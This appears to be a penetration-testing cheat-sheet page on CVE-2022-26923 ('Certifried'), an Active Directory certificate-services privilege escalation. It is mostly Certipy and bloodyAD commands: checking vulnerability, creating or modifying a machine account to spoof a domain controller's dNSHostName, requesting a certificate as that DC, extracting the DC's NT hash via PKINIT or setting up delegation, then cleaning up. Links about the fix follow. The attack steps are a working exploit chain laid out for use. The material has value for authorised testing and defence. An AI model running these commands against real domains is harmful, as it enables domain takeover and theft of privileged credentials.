Comment on page
dNSHostName Spoofing (Certifried)

CVE-2022-26923
​https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4​
​https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7​
​https://www.semperis.com/blog/ad-vulnerability-cve-2022-26923/​
​https://gist.github.com/Wh04m1001/355c0f697bfaaf6546e3b698295d1aa1​
​https://gist.github.com/dmchell/478d83f369260bd4e4cd380712f6bb6e​
​https://github.com/aniqfakhrul/certifried.py​
​https://gist.github.com/tothi/f89a37127f2233352d74eef6c748ca25​
Check
If there's an object SID printed when requesting a certificate based on the User or Machine templates, the AD environment is not vulnerable:
$ certipy req -u [email protected] -p 'Passw0rd!' -target CA01.megacorp.local -ca CorpCA -template User -dc-ip 192.168.1.11
Certipy v3.0.0 - by Oliver Lyak (ly4k)
​
[*] Requesting certificate
[*] Successfully requested certificate
[*] Request ID is 120
[*] Got certificate with UPN '[email protected]'
[*] Certificate object SID is 'S-1-5-21-1230029644-1443616230-1161330039-2139'  <== NOT vulnerable
[*] Saved certificate and private key to 'snovvcrash.pfx'
Exploit
Create a new machine account with dNSHostName containing FQDN of a DC:
$ certipy account create -u [email protected] -p 'Passw0rd!' -target DC01.megacorp.local -user FAKEMACHINE -dns DC01.megacorp.local
Or change dNSHostName property manually for an already pwned machine account, e.g. via pre2k (will definitely break stuff!):
$ certipy account update -u [email protected] -p 'Passw0rd!' -target DC01.megacorp.local -user PWNEDMACHINE -spns ''
$ certipy account update -u [email protected] -p 'Passw0rd!' -target DC01.megacorp.local -user PWNEDMACHINE -dns DC01.megacorp.local
Request a certificate on behalf of that machine account with spoofed dNSHostName:
$ certipy req -u '[email protected]' -p 'M4chinePassw0rd!' -target CA01.megacorp.local -ca CorpCA -template Machine -dc-ip 192.168.1.11
Abuse PKINIT
Authenticate with the obtained certificate and get DC's NT hash via PKINIT:
$ certipy auth -pfx dc01.pfx -dc-ip 192.168.1.11
Abuse RBCD
​https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html​
Authenticate with obtained certificate and configure RBCD on a DC via bloodyAD to allow delegation to the fake machine account:
$ openssl pkcs12 -in dc01.pfx -out dc01.pem -nodes
$ python bloodyAD.py -d megacorp.local -c ":dc01.pem" --host 192.168.1.11 setRbcd 'FAKEMACHINE$' 'DC01$'
Clean Up
If dNSHostName was modified for an existing machine account, roll back the changes:
$ certipy account update -u [email protected] -p 'Passw0rd!' -target DC01.megacorp.local -user PWNEDMACHINE -dns PWNEDMACHINE.megacorp.local
$ certipy account update -u [email protected] -p 'Passw0rd!' -target DC01.megacorp.local -user PWNEDMACHINE -spns WSMAN/pwnedmachine.MEGACORP.LOCAL,WSMAN/pwnedmachine,TERMSRV/pwnedmachine.MEGACORP.LOCAL,TERMSRV/pwnedmachine,RestrictedKrbHost/pwnedmachine,HOST/pwnedmachine,RestrictedKrbHost/pwnedmachine.MEGACORP.LOCAL,HOST/pwnedmachine.MEGACORP.LOCAL
A list of SPNs to backup can be taken from a BH dump:
$ cat 20230301144823_computers.json | jq -r '.data[].Properties | select(.name == "PWNEDMACHINE.MEGACORP.LOCAL") | .serviceprincipalnames'
About the Fix
​https://blog.qdsecurity.se/2022/05/27/manually-injecting-a-sid-in-a-certificate/​
​https://github.com/GhostPack/Certify/commit/71636c435f2e5e7d8d0770154464f44da356ca42​
​https://elkement.blog/2022/06/13/defused-that-san-flag/​
​https://elkement.blog/2022/05/20/how-to-add-a-subject-alternative-name-safely/​
​https://elkement.blog/2023/03/30/lord-of-the-sid-how-to-add-the-objectsid-attribute-to-a-certificate-manually/​
Last modified 7mo ago